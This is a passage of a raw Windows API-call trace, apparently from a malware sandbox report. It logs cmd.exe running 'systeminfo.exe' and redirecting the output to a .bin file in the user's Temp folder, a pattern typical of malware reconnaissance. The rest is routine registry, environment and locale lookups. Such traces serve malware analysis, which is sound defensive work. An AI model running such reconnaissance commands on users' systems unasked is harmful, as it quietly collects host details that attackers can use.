lpData=0x4a21efeb00*=0x40, lpcbData=0x4a21efeae4*=0x1000) returned 0x2 [0254.443] RegCloseKey (hKey=0x78) returned 0x0 [0254.443] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4a21efeae8 | out: phkResult=0x4a21efeae8*=0x78) returned 0x0 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x0, lpData=0x4a21efeb00*=0x40, lpcbData=0x4a21efeae4*=0x1000) returned 0x2 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x4, lpData=0x4a21efeb00*=0x1, lpcbData=0x4a21efeae4*=0x4) returned 0x0 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x0, lpData=0x4a21efeb00*=0x1, lpcbData=0x4a21efeae4*=0x1000) returned 0x2 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x4, lpData=0x4a21efeb00*=0x0, lpcbData=0x4a21efeae4*=0x4) returned 0x0 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x4, lpData=0x4a21efeb00*=0x9, lpcbData=0x4a21efeae4*=0x4) returned 0x0 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x4, lpData=0x4a21efeb00*=0x9, lpcbData=0x4a21efeae4*=0x4) returned 0x0 [0254.443] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4a21efeae0, lpData=0x4a21efeb00, lpcbData=0x4a21efeae4*=0x1000 | out: lpType=0x4a21efeae0*=0x0, lpData=0x4a21efeb00*=0x9, lpcbData=0x4a21efeae4*=0x1000) returned 0x2 [0254.443] RegCloseKey (hKey=0x78) returned 0x0 [0254.444] time (in: timer=0x0 | out: timer=0x0) returned 0x5be0dffd [0254.444] srand (_Seed=0x5be0dffd) [0254.444] GetCommandLineW () returned="cmd /C \"systeminfo.exe > C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" [0254.444] GetCommandLineW () returned="cmd /C \"systeminfo.exe > C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" [0254.444] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff60da00920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0254.444] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a22005640, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0254.444] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0254.444] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0254.444] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0254.444] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0254.444] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0254.444] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0254.444] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0254.444] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0254.444] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0254.444] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0254.444] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0254.445] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0254.445] GetEnvironmentStringsW () returned 0x4a22005850* [0254.445] FreeEnvironmentStringsA (penv="=") returned 1 [0254.445] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0254.445] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0254.445] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0254.445] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0254.445] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0254.445] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0254.445] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0254.445] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0254.445] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0254.445] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0254.445] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a21eff8f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0254.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x4a21eff8f0, lpFilePart=0x4a21eff8d0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x4a21eff8d0*="system32") returned 0x13 [0254.445] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0254.446] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x4a21eff600 | out: lpFindFileData=0x4a21eff600) returned 0x4a22000720 [0254.447] FindClose (in: hFindFile=0x4a22000720 | out: hFindFile=0x4a22000720) returned 1 [0254.447] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x4a21eff600 | out: lpFindFileData=0x4a21eff600) returned 0x4a2200af00 [0254.447] FindClose (in: hFindFile=0x4a2200af00 | out: hFindFile=0x4a2200af00) returned 1 [0254.448] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0254.448] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0254.448] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0254.448] GetEnvironmentStringsW () returned 0x4a22007520* [0254.448] FreeEnvironmentStringsA (penv="=") returned 1 [0254.448] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff60da00920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0254.449] GetConsoleOutputCP () returned 0x1b5 [0254.450] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0254.450] GetUserDefaultLCID () returned 0x409 [0254.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff60d9fc680, cchData=8 | out: lpLCData=":") returned 2 [0254.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4a21effa20, cchData=128 | out: lpLCData="0") returned 2 [0254.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4a21effa20, cchData=128 | out: lpLCData="0") returned 2 [0254.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4a21effa20, cchData=128 | out: lpLCData="1") returned 2 [0254.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff60d9fc690, cchData=8 | out: lpLCData="/") returned 2 [0254.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff60d9fc6e0, cchData=32 | out: lpLCData="Mon") returned 4 [0254.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff60d9fc720, cchData=32 | out: lpLCData="Tue") returned 4 [0254.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff60d9fc760, cchData=32 | out: lpLCData="Wed") returned 4 [0254.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff60d9fc7a0, cchData=32 | out: lpLCData="Thu") returned 4 [0254.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff60d9fc7e0, cchData=32 | out: lpLCData="Fri") returned 4 [0254.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff60d9fc820, cchData=32 | out: lpLCData="Sat") returned 4 [0254.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff60d9fc860, cchData=32 | out: lpLCData="Sun") returned 4 [0254.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff60d9fc6a0, cchData=8 | out: lpLCData=".") returned 2 [0254.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff60d9fc6c0, cchData=8 | out: lpLCData=",") returned 2 [0254.451] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0254.452] GetConsoleTitleW (in: lpConsoleTitle=0x4a22001070, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0254.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0254.452] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="CopyFileExW") returned 0x7ff977ad25e0 [0254.453] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="IsDebuggerPresent") returned 0x7ff977ad1f90 [0254.453] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="SetConsoleInputExeNameW") returned 0x7ff975423a10 [0254.454] _wcsicmp (_String1="systeminfo.exe", _String2=")") returned 74 [0254.454] _wcsicmp (_String1="FOR", _String2="systeminfo.exe") returned -13 [0254.454] _wcsicmp (_String1="FOR/?", _String2="systeminfo.exe") returned -13 [0254.454] _wcsicmp (_String1="IF", _String2="systeminfo.exe") returned -10 [0254.454] _wcsicmp (_String1="IF/?", _String2="systeminfo.exe") returned -10 [0254.454] _wcsicmp (_String1="REM", _String2="systeminfo.exe") returned -1 [0254.454] _wcsicmp (_String1="REM/?", _String2="systeminfo.exe") returned -1 [0254.458] _get_osfhandle (_FileHandle=1) returned 0x24 [0254.458] _get_osfhandle (_FileHandle=1) returned 0x24 [0254.459] _get_osfhandle (_FileHandle=1) returned 0x24 [0254.459] GetFileType (hFile=0x24) returned 0x2 [0254.459] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0254.459] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x4a21eff8e8 | out: lpMode=0x4a21eff8e8) returned 1 [0254.460] _dup (_FileHandle=1) returned 3 [0254.460] _close (_FileHandle=1) returned 0 [0254.460] _wcsicmp (_String1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1", _String2="con") returned -53 [0254.460] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\19e9.bin1"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x4a21eff880, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24 [0254.461] _open_osfhandle (_OSFileHandle=0x24, _Flags=8) returned 1 [0254.461] GetConsoleTitleW (in: lpConsoleTitle=0x4a21eff910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0254.462] GetFileAttributesW (lpFileName="systeminfo.exe" (normalized: "c:\\windows\\system32\\systeminfo.exe")) returned 0x20 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="DIR") returned 15 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="ERASE") returned 14 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="DEL") returned 15 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="TYPE") returned -1 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="COPY") returned 16 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="CD") returned 16 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="CHDIR") returned 16 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="RENAME") returned 1 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="REN") returned 1 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="ECHO") returned 14 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="SET") returned 20 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="PAUSE") returned 3 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="DATE") returned 15 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="TIME") returned -1 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="PROMPT") returned 3 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="MD") returned 6 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="MKDIR") returned 6 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="RD") returned 1 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="RMDIR") returned 1 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="PATH") returned 3 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="GOTO") returned 12 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="SHIFT") returned 17 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="CLS") returned 16 [0254.463] _wcsicmp (_String1="systeminfo.exe", _String2="CALL") returned 16 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="VERIFY") returned -3 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="VER") returned -3 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="VOL") returned -3 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="EXIT") returned 14 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="SETLOCAL") returned 20 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="ENDLOCAL") returned 14 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="TITLE") returned -1 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="START") returned 5 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="DPATH") returned 15 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="KEYS") returned 8 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="MOVE") returned 6 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="PUSHD") returned 3 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="POPD") returned 3 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="ASSOC") returned 18 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="FTYPE") returned 13 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="BREAK") returned 17 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="COLOR") returned 16 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="MKLINK") returned 6 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="DIR") returned 15 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="ERASE") returned 14 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="DEL") returned 15 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="TYPE") returned -1 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="COPY") returned 16 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="CD") returned 16 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="CHDIR") returned 16 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="RENAME") returned 1 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="REN") returned 1 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="ECHO") returned 14 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="SET") returned 20 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="PAUSE") returned 3 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="DATE") returned 15 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="TIME") returned -1 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="PROMPT") returned 3 [0254.464] _wcsicmp (_String1="systeminfo.exe", _String2="MD") returned 6 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="MKDIR") returned 6 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="RD") returned 1 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="RMDIR") returned 1 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="PATH") returned 3 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="GOTO") returned 12 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="SHIFT") returned 17 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="CLS") returned 16 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="CALL") returned 16 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="VERIFY") returned -3 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="VER") returned -3 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="VOL") returned -3 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="EXIT") returned 14 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="SETLOCAL") returned 20 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="ENDLOCAL") returned 14 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="TITLE") returned -1 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="START") returned 5 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="DPATH") returned 15 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="KEYS") returned 8 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="MOVE") returned 6 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="PUSHD") returned 3 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="POPD") returned 3 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="ASSOC") returned 18 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="FTYPE") returned 13 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="BREAK") returned 17 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="COLOR") returned 16 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="MKLINK") returned 6 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="FOR") returned 13 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="IF") returned 10 [0254.465] _wcsicmp (_String1="systeminfo.exe", _String2="REM") returned 1 [0254.466] _wcsnicmp (_String1="syst", _String2="cmd ", _MaxCount=0x4) returned 16 [0254.467] SetErrorMode (uMode=0x0) returned 0x0 [0254.467] SetErrorMode (uMode=0x1) returned 0x0 [0254.467] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4a22007530, lpFilePart=0x4a21eff1b0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x4a21eff1b0*="system32") returned 0x13 [0254.467] SetErrorMode (uMode=0x0) returned 0x1 [0254.467] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0254.467] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0254.474] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0254.476] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0254.476] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\systeminfo.exe", fInfoLevelId=0x1, lpFindFileData=0x4a21efef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4a21efef30) returned 0x4a220078e0 [0254.476] FindClose (in: hFindFile=0x4a220078e0 | out: hFindFile=0x4a220078e0) returned 1 [0254.476] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0254.476] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0254.476] GetConsoleTitleW (in: lpConsoleTitle=0x4a21eff490, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0254.477] InitializeProcThreadAttributeList (in: lpAttributeList=0x4a21eff3b0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4a21eff2b0 | out: lpAttributeList=0x4a21eff3b0, lpSize=0x4a21eff2b0) returned 1 [0254.477] UpdateProcThreadAttribute (in: lpAttributeList=0x4a21eff3b0, dwFlags=0x0, Attribute=0x60001, lpValue=0x4a21eff29c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4a21eff3b0, lpPreviousValue=0x0) returned 1 [0254.477] GetStartupInfoW (in: lpStartupInfo=0x4a21eff340 | out: lpStartupInfo=0x4a21eff340*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0254.477] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0254.478] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0254.478] lstrcmpW (lpString1="\\systeminfo.exe", lpString2="\\XCOPY.EXE") returned -1 [0254.480] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\systeminfo.exe", lpCommandLine="systeminfo.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x4a21eff2d0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="systeminfo.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4a21eff2b8 | out: lpCommandLine="systeminfo.exe ", lpProcessInformation=0x4a21eff2b8*(hProcess=0x90, hThread=0x8c, dwProcessId=0xbd0, dwThreadId=0xbbc)) returned 1 [0254.825] CloseHandle (hObject=0x8c) returned 1 [0254.825] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0254.825] GetEnvironmentStringsW () returned 0x4a22007ee0* [0254.825] FreeEnvironmentStringsA (penv="=") returned 1 [0254.825] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0263.068] GetExitCodeProcess (in: hProcess=0x90, lpExitCode=0x4a21eff238 | out: lpExitCode=0x4a21eff238*=0x0) returned 1 [0263.068] CloseHandle (hObject=0x90) returned 1 [0263.068] _vsnwprintf (in: _Buffer=0x4a21eff3f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x4a21eff248 | out: _Buffer="00000000") returned 8 [0263.069] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0263.069] GetEnvironmentStringsW () returned 0x4a22017a00* [0263.069] FreeEnvironmentStringsA (penv="=") returned 1 [0263.069] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0263.069] GetEnvironmentStringsW () returned 0x4a22017a00* [0263.069] FreeEnvironmentStringsA (penv="=") returned 1 [0263.069] DeleteProcThreadAttributeList (in: lpAttributeList=0x4a21eff3b0 | out: lpAttributeList=0x4a21eff3b0) [0263.069] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0263.070] _close (_FileHandle=3) returned 0 [0263.070] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.070] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1 [0263.071] _get_osfhandle (_FileHandle=1) returned 0x24 [0263.071] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff60d9f85ec 